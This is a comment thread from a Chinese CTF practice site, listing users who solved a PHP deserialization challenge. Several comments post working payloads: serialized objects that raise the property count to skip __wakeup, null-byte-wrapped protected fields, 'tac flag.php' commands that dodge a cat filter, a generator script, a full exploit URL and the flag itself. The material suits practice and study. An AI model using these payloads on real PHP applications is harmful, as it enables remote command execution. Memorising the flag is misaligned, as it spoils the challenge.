评分(3)
解题动态
OldWolfofFarron 攻破了该题 22小时前
liqliq 攻破了该题 1天前
catdogpeach 攻破了该题 4天前
白牧羊人 攻破了该题 10天前
清风伴我 攻破了该题 10天前
2324281128 攻破了该题 12天前
18713476188jiang 攻破了该题 12天前
asd+1024 攻破了该题 18天前
Daisys 攻破了该题 20天前
lwq522725 攻破了该题 23天前
沈奕 攻破了该题 24天前
18835780752 攻破了该题 24天前
tianxiangfazhan 攻破了该题 29天前
changkong 攻破了该题 29天前
网络小梦 攻破了该题 1月前
Y07 攻破了该题 1月前
xiaoshi 攻破了该题 1月前
1004025151 攻破了该题 1月前
19591587311 攻破了该题 1月前
评论
18956160518 1月前
举报
https://blog.csdn.net/m0_57954651/article/details/127866733
EtHat 4月前
举报
O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
xht0525 6月前
举报
nl flag.php|base64
不会编程的崽 6月前
举报
<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>
不会编程的崽 6月前
举报
O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
c41vin 10月前
举报
0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6
wxy1343 10月前
举报
http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}
wxy1343 10月前
举报
flag{Unser1alize_and_2CE_Add}
yuanyipaceandlove 11月前
举报
class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;
15683956189 1年前
举报
特别要注意下url编码的问题